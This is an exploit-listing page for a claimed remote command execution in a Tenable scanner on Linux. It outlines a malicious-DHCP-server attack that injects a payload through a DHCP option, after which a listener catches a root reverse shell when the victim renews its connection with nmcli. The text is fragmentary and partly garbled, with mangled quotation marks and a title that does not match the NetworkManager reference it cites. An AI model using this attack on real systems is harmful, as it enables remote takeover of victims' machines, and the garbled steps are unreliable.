Exploits / Vulnerability Discovered : 2018-09-07 |
Type : remote |
Platform : linux
This exploit / vulnerability Tenable wasscanner 7.4.1708 remote command execution is for educational purposes only and if it is used you will do on your own risk!
# DHCP-option-3 => gateway IP/ DHCP server IP.
# DHCP-option-6 => DNS IP, which can be same as gateway IP( not mandatory)
# DHCP-range => simply subnet range (1h, for 1 hour only)
# DHCP option=> ì252,xí&<payload> #î
# Start the listener on port 5555 on other terminal .
# Step 2: Send the normal IP request to the malicious DHCP server from the victim machine.
nmcli con up ìWired Connection 1î && ifconfig
# Step 3: Check the listener, we have got the reverse shell with root privileges.
# Reference: https://www.exploit-db.com/docs/english/45334-obtaining-command-execution-through-the-networkmanager-daemon.pdf